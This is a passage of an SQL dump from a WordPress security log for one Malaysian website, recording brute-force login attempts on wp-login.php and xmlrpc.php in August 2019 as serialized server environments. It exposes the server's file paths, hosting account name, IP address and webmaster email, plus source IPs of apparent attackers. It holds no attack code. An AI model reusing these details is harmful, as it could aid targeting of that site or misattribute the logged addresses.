empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"190.202.124.186\";s:11:\"REMOTE_PORT\";s:5:\"46870\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN31XxaD7qVX4VJuZ-ZmgAAABc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566799829.6934\";s:12:\"REQUEST_TIME\";s:10:\"1566799829\";}}','notice','2019-08-26 06:10:31','2019-08-26 06:10:30',17683168,19174024,'https://bintara.com.my/wp-login.php',1,0,'190.202.124.186'),(23058,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"190.202.124.186\";s:11:\"REMOTE_PORT\";s:5:\"47141\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN32UlLQKVpx7Mms7u-mAAAAdI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566799833.4072\";s:12:\"REQUEST_TIME\";s:10:\"1566799833\";}}','notice','2019-08-26 06:10:34','2019-08-26 06:10:33',18201384,19498656,'https://bintara.com.my/xmlrpc.php',1,0,'190.202.124.186'),(23059,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.154.92.234\";s:11:\"REMOTE_PORT\";s:5:\"43372\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN4HnxaD7qVX4VJuZ-ZxQAAABI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566799902.5088\";s:12:\"REQUEST_TIME\";s:10:\"1566799902\";}}','notice','2019-08-26 06:11:44','2019-08-26 06:11:42',17684520,19174416,'https://bintara.com.my/wp-login.php',1,0,'104.154.92.234'),(23060,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.154.92.234\";s:11:\"REMOTE_PORT\";s:5:\"44614\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN4P3xaD7qVX4VJuZ-Z1gAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566799935.7894\";s:12:\"REQUEST_TIME\";s:10:\"1566799935\";}}','notice','2019-08-26 06:12:17','2019-08-26 06:12:16',18201712,19498264,'https://bintara.com.my/xmlrpc.php',1,0,'104.154.92.234'),(23061,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.95.50.21\";s:11:\"REMOTE_PORT\";s:5:\"59847\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN5qHxaD7qVX4VJuZ-avAAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566800296.897\";s:12:\"REQUEST_TIME\";s:10:\"1566800296\";}}','notice','2019-08-26 06:18:19','2019-08-26 06:18:17',17683880,19174480,'https://bintara.com.my/wp-login.php',1,0,'23.95.50.21'),(23062,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.187.219\";s:11:\"REMOTE_PORT\";s:5:\"42672\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN6l3xaD7qVX4VJuZ-bagAAABE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566800536.0091\";s:12:\"REQUEST_TIME\";s:10:\"1566800536\";}}','notice','2019-08-26 06:22:17','2019-08-26 06:22:16',17684920,19174416,'https://bintara.com.my/wp-login.php',1,0,'128.199.187.219'),(23063,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.225.39.227\";s:11:\"REMOTE_PORT\";s:5:\"35664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN69klLQKVpx7Mms7u-@gAAAcc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566800630.2871\";s:12:\"REQUEST_TIME\";s:10:\"1566800630\";}}','notice','2019-08-26 06:23:51','2019-08-26 06:23:50',17682472,19173776,'https://bintara.com.my/wp-login.php',1,0,'185.225.39.227'),(23064,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.225.39.227\";s:11:\"REMOTE_PORT\";s:5:\"36190\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN6@bLuw7edOKpgf7B1xgAAAIY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566800633.4744\";s:12:\"REQUEST_TIME\";s:10:\"1566800633\";}}','notice','2019-08-26 06:23:54','2019-08-26 06:23:53',18205584,19503648,'https://bintara.com.my/xmlrpc.php',1,0,'185.225.39.227'),(23065,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"45.122.223.61\";s:11:\"REMOTE_PORT\";s:5:\"57512\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN7cHxaD7qVX4VJuZ-cbAAAAA8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566800752.8682\";s:12:\"REQUEST_TIME\";s:10:\"1566800752\";}}','notice','2019-08-26 06:25:54','2019-08-26 06:25:53',17683016,19173720,'https://bintara.com.my/wp-login.php',1,0,'45.122.223.61'),(23121,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 